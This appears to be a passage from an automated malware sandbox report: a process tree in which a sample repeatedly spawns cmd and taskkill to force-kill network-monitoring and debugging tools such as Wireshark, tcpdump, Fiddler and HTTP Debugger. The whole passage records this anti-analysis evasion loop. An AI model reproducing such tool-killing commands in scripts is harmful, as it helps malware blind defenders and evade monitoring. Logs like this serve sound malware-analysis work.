C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3976

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:2112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:1568

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:1972

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:116

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4048

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:3396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:2700

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:3264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:3296

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:3580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:2968

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:1020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:4888

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:1596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:2732

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:3492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:4184

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:4332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:4280

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:5116

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:3264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:4932

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4976

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:1216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:3124

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:1908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:4496

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3292

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:3716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:3364

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:4636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:2920

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:2036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:3676

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:2172

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:1008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:1656

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:4652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:1788

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:4364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:2476

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:4396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:4040

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:3484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:4100

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:1588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:3852

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2076

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:3732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:4300

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2264

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:4528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:3716

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:4748

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:2152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:4836

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:2920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:1572

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:4440

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3492

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:3120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:3412

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2172

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:4792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:1504

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:4568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:3692

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:2532

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:1020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:616

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:2476

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:3580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:2056

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
- Kills process with taskkill
PID:2020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:2988

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:1588

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:2204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:4144

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3732

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:4288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:1568

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:3304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:1768

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:3716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:3264

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:4748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:4028

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:5012

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:3128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:4192

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4184

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:5096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:4280

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:3508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:4440

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:2976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:3412

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:4568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:1504

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:4364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:1752

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:1704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:1616

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:2536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:3060

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:2576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:2212

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:3612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:3396

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:1908

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:2112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:3540

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4288

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:3468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:4300

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3304

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:3912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:3616

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4496

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:3096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:1748

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:3300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:4924

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2036

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:3120

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
- Kills process with taskkill
PID:4384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:2408

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4652

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:3692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:4100

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:4220

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:2636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:2444

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:1176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:232

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:4252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:4940

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:3916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:4156

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:4084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:4444

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:5012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:4516

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:2728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:2536

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:616

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:1008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:2444

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:1572

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:2408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:2844

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:4528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:748

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:956

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:3800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:4516

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
- Kills process with taskkill
PID:3144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:3128

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2444

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:2508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:4940

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:2844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:4364

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3616

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:4496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:4904

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:2700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:4836

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:4428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:4220

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:2240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:2508

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:4572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:2472

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:4444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:3508

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4496

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:4636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:4048

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:2956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:2176

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4428

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:4876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:3912

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:380

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:4912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:1104

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:3408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:3096

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:3168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:828

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2636

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:4048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:836

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:5100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:2936

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:4568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:4188

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:676

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:4100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:2444

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4912

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:2924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:3472

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:2076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:4636

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:2228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:4364

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:4156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:4904

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
- Kills process with taskkill
PID:2636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:4448

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:2176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:4848

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:3916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:428

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:2180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:60

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:3144

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:3472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:2812

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:4636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:3032

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:4836

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:2916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:4468

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:4644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:2936

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:4568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:4188

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:1568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:4912

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:2908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:400

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:4652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:3836

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:4000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:1048

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:3800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:2184

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:4904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:4040

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:980

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:4984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:760

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:4352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:2924

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:4732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:452

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:4636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:4384

